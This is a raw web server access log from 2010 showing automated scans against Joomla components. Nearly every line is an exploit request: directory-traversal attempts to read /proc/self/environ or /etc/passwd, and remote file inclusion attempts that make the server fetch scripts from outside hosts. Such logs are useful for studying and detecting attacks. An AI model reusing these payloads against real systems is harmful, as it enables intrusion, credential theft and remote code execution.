174.121.240.147 - - [27/Jul/2010:15:22:07 +0200] "GET /logs//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-" "libwww-perl/5.810"
78.41.204.220 - - [27/Jul/2010:15:22:39 +0200] "GET /logs//?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 801 "-" "libwww-perl/5.813"
78.41.204.220 - - [27/Jul/2010:15:22:39 +0200] "GET //?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.813"
174.121.192.28 - - [27/Jul/2010:15:34:34 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.810"
174.121.192.28 - - [27/Jul/2010:15:34:34 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.810"
91.121.67.226 - - [27/Jul/2010:15:34:43 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
91.121.67.226 - - [27/Jul/2010:15:34:43 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
78.41.233.128 - - [27/Jul/2010:15:34:53 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:15:34:53 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
81.93.3.182 - - [27/Jul/2010:15:35:07 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:15:35:07 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.808"
99.198.108.74 - - [27/Jul/2010:15:35:27 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.831"
99.198.108.74 - - [27/Jul/2010:15:35:27 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.831"
85.12.15.44 - - [27/Jul/2010:15:36:01 +0200] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ins.fileave.com/Bot/fx29id1.txt?? HTTP/1.1" 404 357 "-" "Mozilla/5.0"
85.12.15.44 - - [27/Jul/2010:15:36:01 +0200] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ins.fileave.com/Bot/fx29id1.txt?? HTTP/1.1" 404 352 "-" "Mozilla/5.0"
85.12.15.44 - - [27/Jul/2010:15:36:01 +0200] "GET /logs/access_log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ins.fileave.com/Bot/fx29id1.txt?? HTTP/1.1" 404 370 "-" "Mozilla/5.0"
85.12.15.44 - - [27/Jul/2010:15:36:06 +0200] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ins.fileave.com/Bot/fx29id1.txt?? HTTP/1.1" 404 352 "-" "Mozilla/5.0"
85.12.15.44 - - [27/Jul/2010:15:36:06 +0200] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ins.fileave.com/Bot/fx29id1.txt?? HTTP/1.1" 404 357 "-" "Mozilla/5.0"
85.12.15.44 - - [27/Jul/2010:15:36:06 +0200] "GET /logs/access_log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ins.fileave.com/Bot/fx29id1.txt?? HTTP/1.1" 404 368 "-" "Mozilla/5.0"
85.12.15.44 - - [27/Jul/2010:15:38:14 +0200] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ins.fileave.com/Bot/fx29id1.txt?? HTTP/1.1" 404 352 "-" "Mozilla/5.0"
85.12.15.44 - - [27/Jul/2010:15:38:14 +0200] "GET /logs/access_log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ins.fileave.com/Bot/fx29id1.txt?? HTTP/1.1" 404 368 "-" "Mozilla/5.0"
85.12.15.44 - - [27/Jul/2010:15:38:14 +0200] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ins.fileave.com/Bot/fx29id1.txt?? HTTP/1.1" 404 357 "-" "Mozilla/5.0"
157.181.180.23 - - [27/Jul/2010:15:44:33 +0200] "POST /logs/error_log/contact.php HTTP/1.1" 404 312 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
157.181.180.23 - - [27/Jul/2010:15:44:33 +0200] "POST /contact.php HTTP/1.1" 404 297 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
157.181.180.23 - - [27/Jul/2010:15:44:33 +0200] "POST /logs/contact.php HTTP/1.1" 404 302 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
157.181.180.23 - - [27/Jul/2010:15:44:33 +0200] "POST /logs/error_log/contact.php HTTP/1.1" 404 312 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
157.181.180.23 - - [27/Jul/2010:15:44:34 +0200] "POST /contact.php HTTP/1.1" 404 297 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
157.181.180.23 - - [27/Jul/2010:15:44:34 +0200] "POST /logs/contact.php HTTP/1.1" 404 302 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
87.98.217.83 - - [27/Jul/2010:15:44:42 +0200] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:15:44:42 +0200] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:15:44:42 +0200] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:15:44:42 +0200] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
195.5.163.207 - - [27/Jul/2010:15:47:33 +0200] "GET /*.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
195.5.163.207 - - [27/Jul/2010:15:47:40 +0200] "GET /*.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
87.98.217.83 - - [27/Jul/2010:15:51:54 +0200] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:15:51:55 +0200] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:15:52:05 +0200] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:15:52:05 +0200] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:15:53:15 +0200] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:15:53:21 +0200] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:15:53:49 +0200] "GET /logs/access_log/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:15:53:49 +0200] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:15:53:49 +0200] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:15:53:51 +0200] "GET /logs/access_log/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:15:53:51 +0200] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:15:53:51 +0200] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
213.229.106.147 - - [27/Jul/2010:15:54:04 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:15:58:49 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:16:00:24 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
67.218.116.169 - - [27/Jul/2010:16:00:30 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
65.13.185.104 - - [27/Jul/2010:16:04:39 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:16:04:39 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:16:04:39 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
122.155.9.169 - - [27/Jul/2010:16:06:13 +0200] "GET /shop_this_skin_path=http://qwez.interfree.it/id.jpg?? HTTP/1.1" 404 337 "-" "libwww-perl/5.805"
122.155.9.169 - - [27/Jul/2010:16:06:17 +0200] "GET /logs/shop_this_skin_path=http://qwez.interfree.it/id.jpg?? HTTP/1.1" 404 342 "-" "libwww-perl/5.805"
87.98.217.83 - - [27/Jul/2010:16:11:00 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:11:00 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
76.70.7.48 - - [27/Jul/2010:16:11:01 +0200] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
87.98.217.83 - - [27/Jul/2010:16:11:04 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:11:04 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
174.121.192.28 - - [27/Jul/2010:16:11:28 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.810"
174.121.192.28 - - [27/Jul/2010:16:11:28 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.810"
99.198.108.74 - - [27/Jul/2010:16:11:30 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.831"
99.198.108.74 - - [27/Jul/2010:16:11:31 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.831"
91.121.67.226 - - [27/Jul/2010:16:11:43 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
91.121.67.226 - - [27/Jul/2010:16:11:43 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:11:49 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:12:00 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
81.93.3.182 - - [27/Jul/2010:16:12:20 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:16:12:20 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.808"
78.41.233.128 - - [27/Jul/2010:16:12:38 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:16:12:38 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
87.98.217.83 - - [27/Jul/2010:16:14:55 +0200] "GET /logs/index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:14:55 +0200] "GET /index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:14:55 +0200] "GET /logs/index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:14:55 +0200] "GET /index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:15:22 +0200] "GET /logs/access_log/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:15:22 +0200] "GET /logs/access_log/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:15:22 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:15:22 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:15:23 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:15:23 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:15:59 +0200] "GET /logs/index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:16:00 +0200] "GET /index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:16:10 +0200] "GET /logs/index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:16:10 +0200] "GET /index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:16:30 +0200] "GET /logs/access_log/index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:16:30 +0200] "GET /index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:16:30 +0200] "GET /logs/index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:16:34 +0200] "GET /index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:16:34 +0200] "GET /index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:16:37 +0200] "GET /logs/access_log/index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:16:37 +0200] "GET /index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:16:37 +0200] "GET /logs/index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
195.5.163.207 - - [27/Jul/2010:16:18:30 +0200] "GET /logs/access_log/*.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-" "libwww-perl/5.79"
195.5.163.207 - - [27/Jul/2010:16:18:30 +0200] "GET /*.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
195.5.163.207 - - [27/Jul/2010:16:18:30 +0200] "GET /logs/*.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
195.5.163.207 - - [27/Jul/2010:16:18:52 +0200] "GET /logs/access_log/*.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-" "libwww-perl/5.79"
195.5.163.207 - - [27/Jul/2010:16:18:52 +0200] "GET /*.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
195.5.163.207 - - [27/Jul/2010:16:18:52 +0200] "GET /logs/*.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
87.98.217.83 - - [27/Jul/2010:16:19:46 +0200] "GET /logs/access_log/index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:19:46 +0200] "GET /index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:19:47 +0200] "GET /logs/index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:19:49 +0200] "GET /logs/access_log/index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:19:49 +0200] "GET /index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:19:50 +0200] "GET /logs/index.php?option=com_delicious&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
193.138.125.55 - - [27/Jul/2010:16:20:10 +0200] "GET /logs/*?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.808"
193.138.125.55 - - [27/Jul/2010:16:20:10 +0200] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
193.138.125.55 - - [27/Jul/2010:16:20:10 +0200] "GET /*?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-" "libwww-perl/5.808"
193.138.125.55 - - [27/Jul/2010:16:20:10 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
188.165.217.175 - - [27/Jul/2010:16:23:19 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
188.165.217.175 - - [27/Jul/2010:16:23:19 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
91.121.141.186 - - [27/Jul/2010:16:23:21 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
91.121.141.186 - - [27/Jul/2010:16:23:21 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
81.93.3.182 - - [27/Jul/2010:16:23:36 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:16:23:36 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.808"
222.124.193.12 - - [27/Jul/2010:16:25:07 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:16:27:49 +0200] "GET //index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:16:29:07 +0200] "GET //index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:16:29:41 +0200] "GET //index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
207.46.199.200 - - [27/Jul/2010:16:29:52 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
125.141.91.138 - - [27/Jul/2010:16:32:43 +0200] "GET /logs/access_log//index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:16:32:43 +0200] "GET //index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:16:32:44 +0200] "GET /logs//index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:16:33:55 +0200] "GET /logs/access_log//index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:16:33:55 +0200] "GET //index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:16:33:56 +0200] "GET /logs//index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:16:34:11 +0200] "GET /logs/access_log//index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:16:34:11 +0200] "GET //index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:16:34:12 +0200] "GET /logs//index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
216.18.201.205 - - [27/Jul/2010:16:38:18 +0200] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 366 "-" "libwww-perl/5.833"
216.18.201.205 - - [27/Jul/2010:16:38:18 +0200] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 361 "-" "libwww-perl/5.833"
213.215.178.34 - - [27/Jul/2010:16:40:30 +0200] "GET /logs/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [27/Jul/2010:16:40:30 +0200] "GET /com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.98.217.83 - - [27/Jul/2010:16:40:36 +0200] "GET /logs//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:40:36 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:40:48 +0200] "GET /logs//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
